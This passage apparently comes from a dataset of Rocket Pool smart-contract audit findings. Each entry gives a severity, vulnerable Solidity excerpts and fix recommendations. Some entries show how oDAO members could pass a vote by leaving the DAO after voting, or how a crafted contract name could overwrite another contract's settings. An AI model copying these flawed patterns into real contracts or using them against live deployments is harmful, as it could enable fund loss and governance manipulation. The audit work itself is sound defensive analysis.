prevent multiple withdrawals within a few blocks\\nwithdrawalBlock = block.number;\\n```\\n\\nThe `slashed` state should be set before any external calls are made:\\n```\\n/// @dev Slash node operator's RPL balance based on nodeSlashBalance\\nfunction \\_slash() private {\\n // Get contracts\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(\"rocketNodeStaking\"));\\n // Slash required amount and reset storage value\\n uint256 slashAmount = nodeSlashBalance;\\n nodeSlashBalance = 0;\\n rocketNodeStaking.slashRPL(nodeAddress, slashAmount);\\n // Record slashing\\n slashed = true;\\n}\\n```\\n\\nIn the bond reducer, the accounting values should be cleared before any external calls are made:\\n```\\n// Get desired to amount\\nuint256 newBondAmount = getUint(keccak256(abi.encodePacked(\"minipool.bond.reduction.value\", msg.sender)));\\nrequire(rocketNodeDeposit.isValidDepositAmount(newBondAmount), \"Invalid bond amount\");\\n// Calculate difference\\nuint256 existingBondAmount = minipool.getNodeDepositBalance();\\nuint256 delta = existingBondAmount.sub(newBondAmount);\\n// Get node address\\naddress nodeAddress = minipool.getNodeAddress();\\n// Increase ETH matched or revert if exceeds limit based on current RPL stake\\nrocketNodeDeposit.increaseEthMatched(nodeAddress, delta);\\n// Increase node operator's deposit credit\\nrocketNodeDeposit.increaseDepositCreditBalance(nodeAddress, delta);\\n// Clean up state\\ndeleteUint(keccak256(abi.encodePacked(\"minipool.bond.reduction.time\", msg.sender)));\\ndeleteUint(keccak256(abi.encodePacked(\"minipool.bond.reduction.value\", msg.sender)));\\n```\\n\\nThe counter for reward snapshot execution should be incremented before RPL gets minted:\\n```\\n// Execute inflation if required\\nrplContract.inflationMintTokens();\\n// Increment the reward index and update the claim interval timestamp\\nincrementRewardIndex();\\n```\\nчWe recommend following the checks-effects-interactions pattern and adjusting any contract state variables before making external calls. With the upgradeable nature of the system, we also recommend strictly adhering to this practice when all external calls are being made to trusted network contracts.чч```\\n/// @notice Withdraw node balances from the minipool and close it. Only accepts calls from the owner\\nfunction close() override external onlyMinipoolOwner(msg.sender) onlyInitialised {\\n // Check current status\\n require(status == MinipoolStatus.Dissolved, \"The minipool can only be closed while dissolved\");\\n // Distribute funds to owner\\n distributeToOwner();\\n // Destroy minipool\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(\"rocketMinipoolManager\"));\\n require(rocketMinipoolManager.getMinipoolExists(address(this)), \"Minipool already closed\");\\n rocketMinipoolManager.destroyMinipool();\\n // Clear state\\n nodeDepositBalance = 0;\\n nodeRefundBalance = 0;\\n userDepositBalance = 0;\\n userDepositBalanceLegacy = 0;\\n userDepositAssignedTime = 0;\\n}\\n```\\n -RocketMinipoolDelegate - Redundant refund() call on forced finalizationчmediumчThe `RocketMinipoolDelegate.refund` function will force finalization if a user previously distributed the pool. However, `_finalise` already calls `_refund()` if there is a node refund balance to transfer, making the additional call to `_refund()` in `refund()` obsolete.\\n```\\nfunction refund() override external onlyMinipoolOwnerOrWithdrawalAddress(msg.sender) onlyInitialised {\\n // Check refund balance\\n require(nodeRefundBalance > 0, \"No amount of the node deposit is available for refund\");\\n // If this minipool was distributed by a user, force finalisation on the node operator\\n if (!finalised && userDistributed) {\\n \\_finalise();\\n }\\n // Refund node\\n \\_refund();\\n}\\n```\\n\\n```\\nfunction \\_finalise() private {\\n // Get contracts\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(\"rocketMinipoolManager\"));\\n // Can only finalise the pool once\\n require(!finalised, \"Minipool has already been finalised\");\\n // Set finalised flag\\n finalised = true;\\n // If slash is required then perform it\\n if (nodeSlashBalance > 0) {\\n \\_slash();\\n }\\n // Refund node operator if required\\n if (nodeRefundBalance > 0) {\\n \\_refund();\\n }\\n```\\nчResolution\\nFixed in https://github.com/rocket-pool/rocketpool/tree/77d7cca65b7c0557cfda078a4fc45f9ac0cc6cc6 by refactoring `refund()` to avoid a double invocation of `_refund()` in the `_finalise()` codepath.\\nFixed per the recommendation. Thanks.\\nWe recommend refactoring the if condition to contain `_refund()` in the else branch.чч```\\nfunction refund() override external onlyMinipoolOwnerOrWithdrawalAddress(msg.sender) onlyInitialised {\\n // Check refund balance\\n require(nodeRefundBalance > 0, \"No amount of the node deposit is available for refund\");\\n // If this minipool was distributed by a user, force finalisation on the node operator\\n if (!finalised && userDistributed) {\\n \\_finalise();\\n }\\n // Refund node\\n \\_refund();\\n}\\n```\\n -Sparse documentation and accounting complexity AcknowledgedчmediumчThroughout the project, inline documentation is either sparse or missing altogether. Furthermore, few technical documents about the system's design rationale are available. The recent releases' increased complexity makes it significantly harder to trace the flow of funds through the system as components change semantics, are split into separate contracts, etc.\\nIt is essential that documentation not only outlines what is being done but also why and what a function's role in the system's “bigger picture” is. Many comments in the code base fail to fulfill this requirement and are thus redundant, e.g.\\n```\\n// Sanity check that refund balance is zero\\nrequire(nodeRefundBalance == 0, \"Refund balance not zero\");\\n```\\n\\n```\\n// Remove from vacant set\\nrocketMinipoolManager.removeVacantMinipool();\\n```\\n\\n```\\nif (ownerCalling) {\\n // Finalise the minipool if the owner is calling\\n \\_finalise();\\n```\\n\\nThe increased complexity and lack of documentation can increase the likelihood of developer error. Furthermore, the time spent maintaining the code and introducing new developers to the code base will drastically increase. This effect can be especially problematic in the system's accounting of funds as the various stages of a Minipool imply different flows of funds and interactions with external dependencies. Documentation should explain the rationale behind specific hardcoded values, such as the magic `8 ether` boundary for withdrawal detection. An example of a lack of documentation and distribution across components is the calculation and influence of `ethMatched` as it plays a role in:\\nthe minipool bond reducer,\\nthe node deposit contract,\\nthe node manager, and\\nthe node staking contract.чAs the Rocketpool system grows in complexity, we highly recommend significantly increasing the number of inline comments and general technical documentation and exploring ways to centralize the system's accounting further to provide a clear picture of which funds move where and at what point in time. Where the flow of funds is obscured because multiple components or multi-step processes are involved, we recommend adding extensive inline documentation to give context.чч```\\n// Sanity check that refund balance is zero\\nrequire(nodeRefundBalance == 0, \"Refund balance not zero\");\\n```\\n -RocketNodeDistributor - Missing extcodesize check in dynamic proxy Won't Fixчmediumч`RocketNodeDistributor` dynamically retrieves the currently set delegate from the centralized `RocketStorage` contract. The target contract (delegate) is resolved inside the fallback function. It may return `address(0)`. `rocketStorage.getAddress()` does not enforce that the requested settings key exists, which may lead to `RocketNodeDistributor` delegate-calling into `address(0)`, which returns no error. This might stay undetected when calling `RocketNodeDistributorDelegate.distribute()` as the method does not return a value, which is consistent with calling a target address with no code.\\n```\\nfallback() external payable {\\n address \\_target = rocketStorage.getAddress(distributorStorageKey);\\n assembly {\\n calldatacopy(0x0, 0x0, calldatasize())\\n let result := delegatecall(gas(), \\_target, 0x0, calldatasize(), 0x0, 0)\\n returndatacopy(0x0, 0x0, returndatasize())\\n switch result case 0 {revert(0, returndatasize())} default {return (0, returndatasize())}\\n }\\n}\\n```\\n\\n```\\nfunction getAddress(bytes32 \\_key) override external view returns (address r) {\\n return addressStorage[\\_key];\\n}\\n```\\nчBefore delegate-calling into the target contract, check if it exists.\\n```\\nassembly {\\n codeSize := extcodesize(\\_target)\\n}\\nrequire(codeSize > 0);\\n```\\nчч```\\nfallback() external payable {\\n address \\_target = rocketStorage.getAddress(distributorStorageKey);\\n assembly {\\n calldatacopy(0x0, 0x0, calldatasize())\\n let result := delegatecall(gas(), \\_target, 0x0, calldatasize(), 0x0, 0)\\n returndatacopy(0x0, 0x0, returndatasize())\\n switch result case 0 {revert(0, returndatasize())} default {return (0, returndatasize())}\\n }\\n}\\n```\\n -Kicked oDAO members' votes taken into account AcknowledgedчmediumчoDAO members can vote on proposals or submit external data to the system, acting as an oracle. Data submission is based on a vote by itself, and multiple oDAO members must submit the same data until a configurable threshold (51% by default) is reached for the data to be confirmed.\\nWhen a member gets kicked or leaves the oDAO after voting, their vote is still accounted for while the total number of oDAO members decreases.\\nA (group of) malicious oDAO actors may exploit this fact to artificially lower the consensus threshold by voting for a proposal and then leaving the oDAO. This will leave excess votes with the proposal while the total member count decreases.\\nFor example, let's assume there are 17 oDAO members. 9 members must vote for the proposal for it to pass (52.9%). Let's assume 8 members voted for, and the rest abstained and is against the proposal (47%, threshold not met). The proposal is unlikely to pass unless two malicious oDAO members leave the DAO, lowering the member count to 15 in an attempt to manipulate the vote, suddenly inflating vote power from 8/17 (47%; rejected) to 8/15 (53.3%; passed).\\nThe crux is that the votes of ex-oDAO members still count, while the quorum is based on the current oDAO member number.\\nHere are some examples, however, this is a general pattern used for oDAO votes in the system.\\nExample: RocketNetworkPrices\\nMembers submit votes via `submitPrices()`. If the threshold is reached, the proposal is executed. Quorum is based on the current oDAO member count, votes of ex-oDAO members are still accounted for. If a proposal is a near miss, malicious actors can force execute it by leaving the oDAO, lowering the threshold, and then calling `executeUpdatePrices()` to execute it.\\n```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(\"rocketDAONodeTrusted\"));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n // Update the price\\n updatePrices(\\_block, \\_rplPrice);\\n}\\n```\\n\\n```\\nfunction executeUpdatePrices(uint256 \\_block, uint256 \\_rplPrice) override external onlyLatestContract(\"rocketNetworkPrices\", address(this)) {\\n // Check settings\\n```\\n\\nRocketMinipoolBondReducer\\nThe `RocketMinipoolBondReducer` contract's `voteCancelReduction` function takes old votes of previously kicked oDAO members into account. This results in the vote being significantly higher and increases the potential for malicious actors, even after their removal, to sway the vote. Note that a canceled bond reduction cannot be undone.\\n```\\nRocketDAONodeTrustedSettingsMinipoolInterface rocketDAONodeTrustedSettingsMinipool = RocketDAONodeTrustedSettingsMinipoolInterface(getContractAddress(\"rocketDAONodeTrustedSettingsMinipool\"));\\nuint256 quorum = rocketDAONode.getMemberCount().mul(rocketDAONodeTrustedSettingsMinipool.getCancelBondReductionQuorum()).div(calcBase);\\nbytes32 totalCancelVotesKey = keccak256(abi.encodePacked(\"minipool.bond.reduction.vote.count\", \\_minipoolAddress));\\nuint256 totalCancelVotes = getUint(totalCancelVotesKey).add(1);\\nif (totalCancelVotes > quorum) {\\n```\\n\\nRocketNetworkPenalties\\n```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(\"rocketDAONodeTrusted\"));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodePenaltyThreshold()) {\\n setBool(executedKey, true);\\n incrementMinipoolPenaltyCount(\\_minipoolAddress);\\n}\\n```\\n\\n```\\n// Executes incrementMinipoolPenaltyCount if consensus threshold is reached\\nfunction executeUpdatePenalty(address \\_minipoolAddress, uint256 \\_block) override external onlyLatestContract(\"rocketNetworkPenalties\", address(this)) {\\n // Get contracts\\n RocketDAOProtocolSettingsNetworkInterface rocketDAOProtocolSettingsNetwork = RocketDAOProtocolSettingsNetworkInterface(getContractAddress(\"rocketDAOProtocolSettingsNetwork\"));\\n // Get submission keys\\n```\\nчTrack oDAO members' votes and remove them from the tally when the removal from the oDAO is executed.чч```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(\"rocketDAONodeTrusted\"));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n // Update the price\\n updatePrices(\\_block, \\_rplPrice);\\n}\\n```\\n -RocketDAOProtocolSettingsRewards - settings key collission AcknowledgedчmediumчA malicious user may craft a DAO protocol proposal to set a rewards claimer for a specific contract, thus overwriting another contract's settings. This issue arises due to lax requirements when choosing safe settings keys.\\n```\\nfunction setSettingRewardsClaimer(string memory \\_contractName, uint256 \\_perc) override public onlyDAOProtocolProposal {\\n // Get the total perc set, can't be more than 100\\n uint256 percTotal = getRewardsClaimersPercTotal();\\n // If this group already exists, it will update the perc\\n uint256 percTotalUpdate = percTotal.add(\\_perc).sub(getRewardsClaimerPerc(\\_contractName));\\n // Can't be more than a total claim amount of 100%\\n require(percTotalUpdate <= 1 ether, \"Claimers cannot total more than 100%\");\\n // Update the total\\n setUint(keccak256(abi.encodePacked(settingNameSpace,\"rewards.claims\", \"group.totalPerc\")), percTotalUpdate);\\n // Update/Add the claimer amount\\n setUint(keccak256(abi.encodePacked(settingNameSpace, \"rewards.claims\", \"group.amount\", \\_contractName)), \\_perc);\\n // Set the time it was updated at\\n setUint(keccak256(abi.encodePacked(settingNameSpace, \"rewards.claims\", \"group.amount.updated.time\", \\_contractName)), block.timestamp);\\n}\\n```\\n\\nThe method updates the rewards claimer for a specific contract by writing to the following two setting keys:\\n`settingNameSpace.rewards.claimsgroup.amount<_contractName>`\\n`settingNameSpace.rewards.claimsgroup.amount.updated.time<_contractName>`\\nDue to the way the settings hierarchy was chosen in this case, a malicious proposal might define a `<_contractName> = .updated.time` that overwrites the settings of a different contract with an invalid value.\\nNote that the issue of delimiter consistency is also discussed in issue 5.12.\\nThe severity rating is based on the fact that this should be detectable by DAO members. However, following a defense-in-depth approach means that such collisions should be avoided wherever possible.чWe recommend enforcing a unique prefix and delimiter when concatenating user-provided input to setting keys. In this specific case, the settings could be renamed as follows:\\n`settingNameSpace.rewards.claimsgroup.amount.value<_contractName>`\\n`settingNameSpace.rewards.claimsgroup.amount.updated.time<_contractName>`чч```\\nfunction setSettingRewardsClaimer(string memory \\_contractName, uint256 \\_perc) override public onlyDAOProtocolProposal {\\n // Get the total perc set, can't be more than 100\\n uint256 percTotal = getRewardsClaimersPercTotal();\\n // If this group already exists, it will update the perc\\n uint256 percTotalUpdate = percTotal.add(\\_perc).sub(getRewardsClaimerPerc(\\_contractName));\\n // Can't be more than a total claim amount of 100%\\n require(percTotalUpdate <= 1 ether, \"Claimers cannot total more than 100%\");\\n // Update the total\\n setUint(keccak256(abi.encodePacked(settingNameSpace,\"rewards.claims\", \"group.totalPerc\")), percTotalUpdate);\\n // Update/Add the claimer amount\\n setUint(keccak256(abi.encodePacked(settingNameSpace, \"rewards.claims\", \"group.amount\", \\_contractName)), \\_perc);\\n // Set the time it was updated at\\n setUint(keccak256(abi.encodePacked(settingNameSpace, \"rewards.claims\", \"group.amount.updated.time\", \\_contractName)), block.timestamp);\\n}\\n```\\n -RocketDAOProtocolSettingsRewards - missing setting delimiters AcknowledgedчmediumчSettings in the Rocket Pool system are hierarchical, and namespaces are prefixed using dot delimiters.\\nCalling `abi.encodePacked(, )` on strings performs a simple concatenation. According to the settings' naming scheme, it is suggested that the following example writes to a key named: `.rewards.claims.group.amount.<_contractName>`. However, due to missing delimiters, the actual key written to is: `.rewards.claimsgroup.amount<_contractName>`.\\nNote that there is no delimiter between `claims|group` and `amount|<_contractName>`.\\n```\\nfunction setSettingRewardsClaimer(string memory \\_contractName, uint256 \\_perc) override public onlyDAOProtocolProposal {\\n // Get the total perc set, can't be more than 100\\n uint256 percTotal = getRewardsClaimersPercTotal();\\n // If this group already exists, it will update the perc\\n uint256 percTotalUpdate = percTotal.add(\\_perc).sub(getRewardsClaimerPerc(\\_contractName));\\n // Can't be more than a total claim amount of 100%\\n require(percTotalUpdate <= 1 ether, \"Claimers cannot total more than 100%\");\\n // Update the total\\n setUint(keccak256(abi.encodePacked(settingNameSpace,\"rewards.claims\", \"group.totalPerc\")), percTotalUpdate);\\n // Update/Add the claimer amount\\n setUint(keccak256(abi.encodePacked(settingNameSpace, \"rewards.claims\", \"group.amount\", \\_contractName)), \\_perc);\\n // Set the time it was updated at\\n setUint(keccak256(abi.encodePacked(settingNameSpace, \"rewards.claims\", \"group.amount.updated.time\", \\_contractName)), block.timestamp);\\n}\\n```\\nчWe recommend adding the missing intermediate delimiters. The system should enforce delimiters after the last setting key before user input is concatenated to reduce the risk of accidental namespace collisions.чч```\\nfunction setSettingRewardsClaimer(string memory \\_contractName, uint256 \\_perc) override public onlyDAOProtocolProposal {\\n // Get the total perc set, can't be more than 100\\n uint256 percTotal = getRewardsClaimersPercTotal();\\n // If this group already exists, it will update the perc\\n uint256 percTotalUpdate = percTotal.add(\\_perc).sub(getRewardsClaimerPerc(\\_contractName));\\n // Can't be more than a total claim amount of 100%\\n require(percTotalUpdate <= 1 ether, \"Claimers cannot total more than 100%\");\\n // Update the total\\n setUint(keccak256(abi.encodePacked(settingNameSpace,\"rewards.claims\", \"group.totalPerc\")), percTotalUpdate);\\n // Update/Add the claimer amount\\n setUint(keccak256(abi.encodePacked(settingNameSpace, \"rewards.claims\", \"group.amount\", \\_contractName)), \\_perc);\\n // Set the time it was updated at\\n setUint(keccak256(abi.encodePacked(settingNameSpace, \"rewards.claims\", \"group.amount.updated.time\", \\_contractName)), block.timestamp);\\n}\\n```\\n -Use of address instead of specific contract types AcknowledgedчlowчRather than using a low-level `address` type and then casting to the safer contract type, it's better to use the best type available by default so the compiler can eventually check for type safety and contract existence and only downcast to less secure low-level types (address) when necessary.\\n`RocketStorageInterface _rocketStorage` should be declared in the arguments, removing the need to cast the address explicitly.\\n```\\n/// @notice Sets up starting delegate contract and then delegates initialisation to it\\nfunction initialise(address \\_rocketStorage, address \\_nodeAddress) external override notSelf {\\n // Check input\\n require(\\_nodeAddress != address(0), \"Invalid node address\");\\n require(storageState == StorageState.Undefined, \"Already initialised\");\\n // Set storage state to uninitialised\\n storageState = StorageState.Uninitialised;\\n // Set rocketStorage\\n rocketStorage = RocketStorageInterface(\\_rocketStorage);\\n```\\n\\n`RocketMinipoolInterface _minipoolAddress` should be declared in the arguments, removing the need to cast the address explicitly. Downcast to low-level address if needed. The event can be redeclared with the contract type.\\n```\\nfunction beginReduceBondAmount(address \\_minipoolAddress, uint256 \\_newBondAmount) override external onlyLatestContract(\"rocketMinipoolBondReducer\", address(this)) {\\n RocketMinipoolInterface minipool = RocketMinipoolInterface(\\_minipoolAddress);\\n```\\n\\n```\\n/// @notice Returns whether owner of given minipool can reduce bond amount given the waiting period constraint\\n/// @param \\_minipoolAddress Address of the minipool\\nfunction canReduceBondAmount(address \\_minipoolAddress) override public view returns (bool) {\\n RocketMinipoolInterface minipool = RocketMinipoolInterface(\\_minipoolAddress);\\n RocketDAONodeTrustedSettingsMinipoolInterface rocketDAONodeTrustedSettingsMinipool = RocketDAONodeTrustedSettingsMinipoolInterface(getContractAddress(\"rocketDAONodeTrustedSettingsMinipool\"));\\n uint256 reduceBondTime = getUint(keccak256(abi.encodePacked(\"minipool.bond.reduction.time\", \\_minipoolAddress)));\\n return rocketDAONodeTrustedSettingsMinipool.isWithinBondReductionWindow(block.timestamp.sub(reduceBondTime));\\n}\\n```\\n\\n```\\nfunction voteCancelReduction(address \\_minipoolAddress) override external onlyTrustedNode(msg.sender) onlyLatestContract(\"rocketMinipoolBondReducer\", address(this)) {\\n // Prevent calling if consensus has already been reached\\n require(!getReduceBondCancelled(\\_minipoolAddress), \"Already cancelled\");\\n // Get contracts\\n RocketMinipoolInterface minipool = RocketMinipoolInterface(\\_minipoolAddress);\\n```\\n\\nNote that `abi.encode*(contractType)` assumes `address` for contract types by default. An explicit downcast is not required.\\n```\\n » Test example = Test(0x5B38Da6a701c568545dCfcB03FcB875f56beddC4)\\n » abi.encodePacked(\"hi\", example)\\n0x68695b38da6a701c568545dcfcb03fcb875f56beddc4\\n » abi.encodePacked(\"hi\", address(example))\\n0x68695b38da6a701c568545dcfcb03fcb875f56beddc4\\n```\\n\\nMore examples of `address _minipool` declarations:\\n```\\n/// @dev Internal logic to set a minipool's pubkey\\n/// @param \\_pubkey The pubkey to set for the calling minipool\\nfunction \\_setMinipoolPubkey(address \\_minipool, bytes calldata \\_pubkey) private {\\n // Load contracts\\n AddressSetStorageInterface addressSetStorage = AddressSetStorageInterface(getContractAddress(\"addressSetStorage\"));\\n // Initialize minipool & get properties\\n RocketMinipoolInterface minipool = RocketMinipoolInterface(\\_minipool);\\n```\\n\\n```\\nfunction getMinipoolDetails(address \\_minipoolAddress) override external view returns (MinipoolDetails memory) {\\n // Get contracts\\n RocketMinipoolInterface minipoolInterface = RocketMinipoolInterface(\\_minipoolAddress);\\n RocketMinipoolBase minipool = RocketMinipoolBase(payable(\\_minipoolAddress));\\n RocketNetworkPenaltiesInterface rocketNetworkPenalties = RocketNetworkPenaltiesInterface(getContractAddress(\"rocketNetworkPenalties\"));\\n```\\n\\nMore examples of `RocketStorageInterface _rocketStorage` casts:\\n```\\ncontract RocketNodeDistributor is RocketNodeDistributorStorageLayout {\\n bytes32 immutable distributorStorageKey;\\n\\n constructor(address \\_nodeAddress, address \\_rocketStorage) {\\n rocketStorage = RocketStorageInterface(\\_rocketStorage);\\n nodeAddress = \\_nodeAddress;\\n```\\nчWe recommend using more specific types instead of `address` where possible. Downcast if necessary. This goes for parameter types as well as state variable types.чч```\\n/// @notice Sets up starting delegate contract and then delegates initialisation to it\\nfunction initialise(address \\_rocketStorage, address \\_nodeAddress) external override notSelf {\\n // Check input\\n require(\\_nodeAddress != address(0), \"Invalid node address\");\\n require(storageState == StorageState.Undefined, \"Already initialised\");\\n // Set storage state to uninitialised\\n storageState = StorageState.Uninitialised;\\n // Set rocketStorage\\n rocketStorage = RocketStorageInterface(\\_rocketStorage);\\n```\\n -Redundant double casts Acknowledgedчlowч`_rocketStorageAddress` is already of contract type `RocketStorageInterface`.\\n```\\n/// @dev Set the main Rocket Storage address\\nconstructor(RocketStorageInterface \\_rocketStorageAddress) {\\n // Update the contract address\\n rocketStorage = RocketStorageInterface(\\_rocketStorageAddress);\\n}\\n```\\n\\n`_tokenAddress` is already of contract type `ERC20Burnable`.\\n```\\nfunction burnToken(ERC20Burnable \\_tokenAddress, uint256 \\_amount) override external onlyLatestNetworkContract {\\n // Get contract key\\n bytes32 contractKey = keccak256(abi.encodePacked(getContractName(msg.sender), \\_tokenAddress));\\n // Update balances\\n tokenBalances[contractKey] = tokenBalances[contractKey].sub(\\_amount);\\n // Get the token ERC20 instance\\n ERC20Burnable tokenContract = ERC20Burnable(\\_tokenAddress);\\n```\\n\\n`_rocketTokenRPLFixedSupplyAddress` is already of contract type `IERC20`.\\n```\\nconstructor(RocketStorageInterface \\_rocketStorageAddress, IERC20 \\_rocketTokenRPLFixedSupplyAddress) RocketBase(\\_rocketStorageAddress) ERC20(\"Rocket Pool Protocol\", \"RPL\") {\\n // Version\\n version = 1;\\n // Set the mainnet RPL fixed supply token address\\n rplFixedSupplyContract = IERC20(\\_rocketTokenRPLFixedSupplyAddress);\\n```\\nчWe recommend removing the unnecessary double casts and copies of local variables.чч```\\n/// @dev Set the main Rocket Storage address\\nconstructor(RocketStorageInterface \\_rocketStorageAddress) {\\n // Update the contract address\\n rocketStorage = RocketStorageInterface(\\_rocketStorageAddress);\\n}\\n```\\n -RocketMinipoolDelegate - Missing event in prepareVacancyчlowчThe function `prepareVacancy` updates multiple contract state variables and should therefore emit an event.\\n```\\n/// @dev Sets the bond value and vacancy flag on this minipool\\n/// @param \\_bondAmount The bond amount selected by the node operator\\n/// @param \\_currentBalance The current balance of the validator on the beaconchain (will be checked by oDAO and scrubbed if not correct)\\nfunction prepareVacancy(uint256 \\_bondAmount, uint256 \\_currentBalance) override external onlyLatestContract(\"rocketMinipoolManager\", msg.sender) onlyInitialised {\\n // Check status\\n require(status == MinipoolStatus.Initialised, \"Must be in initialised status\");\\n // Sanity check that refund balance is zero\\n require(nodeRefundBalance == 0, \"Refund balance not zero\");\\n // Check balance\\n RocketDAOProtocolSettingsMinipoolInterface rocketDAOProtocolSettingsMinipool = RocketDAOProtocolSettingsMinipoolInterface(getContractAddress(\"rocketDAOProtocolSettingsMinipool\"));\\n uint256 launchAmount = rocketDAOProtocolSettingsMinipool.getLaunchBalance();\\n require(\\_currentBalance >= launchAmount, \"Balance is too low\");\\n // Store bond amount\\n nodeDepositBalance = \\_bondAmount;\\n // Calculate user amount from launch amount\\n userDepositBalance = launchAmount.sub(nodeDepositBalance);\\n // Flag as vacant\\n vacant = true;\\n preMigrationBalance = \\_currentBalance;\\n // Refund the node whatever rewards they have accrued prior to becoming a RP validator\\n nodeRefundBalance = \\_currentBalance.sub(launchAmount);\\n // Set status to preLaunch\\n setStatus(MinipoolStatus.Prelaunch);\\n}\\n```\\nчEmit the missing event.чч```\\n/// @dev Sets the bond value and vacancy flag on this minipool\\n/// @param \\_bondAmount The bond amount selected by the node operator\\n/// @param \\_currentBalance The current balance of the validator on the beaconchain (will be checked by oDAO and scrubbed if not correct)\\nfunction prepareVacancy(uint256 \\_bondAmount, uint256 \\_currentBalance) override external onlyLatestContract(\"rocketMinipoolManager\", msg.sender) onlyInitialised {\\n // Check status\\n require(status == MinipoolStatus.Initialised, \"Must be in initialised status\");\\n // Sanity check that refund balance is zero\\n require(nodeRefundBalance == 0, \"Refund balance not zero\");\\n // Check balance\\n RocketDAOProtocolSettingsMinipoolInterface rocketDAOProtocolSettingsMinipool = RocketDAOProtocolSettingsMinipoolInterface(getContractAddress(\"rocketDAOProtocolSettingsMinipool\"));\\n uint256 launchAmount = rocketDAOProtocolSettingsMinipool.getLaunchBalance();\\n require(\\_currentBalance >= launchAmount, \"Balance is too low\");\\n // Store bond amount\\n nodeDepositBalance = \\_bondAmount;\\n // Calculate user amount from launch amount\\n userDepositBalance = launchAmount.sub(nodeDepositBalance);\\n // Flag as vacant\\n vacant = true;\\n preMigrationBalance = \\_currentBalance;\\n // Refund the node whatever rewards they have accrued prior to becoming a RP validator\\n nodeRefundBalance = \\_currentBalance.sub(launchAmount);\\n // Set status to preLaunch\\n setStatus(MinipoolStatus.Prelaunch);\\n}\\n```\\n -RocketMinipool - Inconsistent access control modifier declaration onlyMinipoolOwner AcknowledgedчlowчThe access control modifier `onlyMinipoolOwner` should be renamed to `onlyMinipoolOwnerOrWithdrawalAddress` to be consistent with the actual check permitting the owner or the withdrawal address to interact with the function. This would also be consistent with other declarations in the codebase.\\nExample\\nThe `onlyMinipoolOwner` modifier in `RocketMinipoolBase` is the same as `onlyMinipoolOwnerOrWithdrawalAddress` in other modules.\\n```\\n/// @dev Only allow access from the owning node address\\nmodifier onlyMinipoolOwner() {\\n // Only the node operator can upgrade\\n address withdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n require(msg.sender == nodeAddress || msg.sender == withdrawalAddress, \"Only the node operator can access this method\");\\n \\_;\\n}\\n```\\n\\n```\\n// Only allow access from the owning node address\\nmodifier onlyMinipoolOwner() {\\n // Only the node operator can upgrade\\n address withdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n require(msg.sender == nodeAddress || msg.sender == withdrawalAddress, \"Only the node operator can access this method\");\\n \\_;\\n}\\n```\\n\\nOther declarations:\\n```\\n/// @dev Only allow access from the owning node address\\nmodifier onlyMinipoolOwner(address \\_nodeAddress) {\\n require(\\_nodeAddress == nodeAddress, \"Invalid minipool owner\");\\n \\_;\\n}\\n\\n/// @dev Only allow access from the owning node address or their withdrawal address\\nmodifier onlyMinipoolOwnerOrWithdrawalAddress(address \\_nodeAddress) {\\n require(\\_nodeAddress == nodeAddress || \\_nodeAddress == rocketStorage.getNodeWithdrawalAddress(nodeAddress), \"Invalid minipool owner\");\\n \\_;\\n}\\n```\\n\\n```\\n// Only allow access from the owning node address\\nmodifier onlyMinipoolOwner(address \\_nodeAddress) {\\n require(\\_nodeAddress == nodeAddress, \"Invalid minipool owner\");\\n \\_;\\n}\\n\\n// Only allow access from the owning node address or their withdrawal address\\nmodifier onlyMinipoolOwnerOrWithdrawalAddress(address \\_nodeAddress) {\\n require(\\_nodeAddress == nodeAddress || \\_nodeAddress == rocketStorage.getNodeWithdrawalAddress(nodeAddress), \"Invalid minipool owner\");\\n \\_;\\n}\\n```\\nчResolution\\nAcknowledged by the client. Not addressed within rocket-pool/[email protected]77d7cca\\nAgreed. This would change a lot of contracts just for a minor improvement in readbility.\\nWe recommend renaming `RocketMinipoolBase.onlyMinipoolOwner` to `RocketMinipoolBase.onlyMinipoolOwnerOrWithdrawalAddress`.чч```\\n/// @dev Only allow access from the owning node address\\nmodifier onlyMinipoolOwner() {\\n // Only the node operator can upgrade\\n address withdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n require(msg.sender == nodeAddress || msg.sender == withdrawalAddress, \"Only the node operator can access this method\");\\n \\_;\\n}\\n```\\n -RocketDAO*Settings - settingNameSpace should be immutable AcknowledgedчlowчThe `settingNameSpace` in the abstract contract `RocketDAONodeTrustedSettings` is only set on contract deployment. Hence, the fields should be declared immutable to make clear that the settings namespace cannot change after construction.\\n`RocketDAONodeTrustedSettings`\\n```\\n// The namespace for a particular group of settings\\nbytes32 settingNameSpace;\\n```\\n\\n```\\n// Construct\\nconstructor(RocketStorageInterface \\_rocketStorageAddress, string memory \\_settingNameSpace) RocketBase(\\_rocketStorageAddress) {\\n // Apply the setting namespace\\n settingNameSpace = keccak256(abi.encodePacked(\"dao.trustednodes.setting.\", \\_settingNameSpace));\\n}\\n```\\n\\n`RocketDAOProtocolSettings`\\n```\\n// The namespace for a particular group of settings\\nbytes32 settingNameSpace;\\n```\\n\\n```\\n// Construct\\nconstructor(RocketStorageInterface \\_rocketStorageAddress, string memory \\_settingNameSpace) RocketBase(\\_rocketStorageAddress) {\\n // Apply the setting namespace\\n settingNameSpace = keccak256(abi.encodePacked(\"dao.protocol.setting.\", \\_settingNameSpace));\\n}\\n```\\n\\n```\\nconstructor(RocketStorageInterface \\_rocketStorageAddress) RocketDAOProtocolSettings(\\_rocketStorageAddress, \"auction\") {\\n // Set version\\n version = 1;\\n```\\nчWe recommend using the `immutable` annotation in Solidity (see Immutable).чч```\\n// The namespace for a particular group of settings\\nbytes32 settingNameSpace;\\n```\\n -Kicked 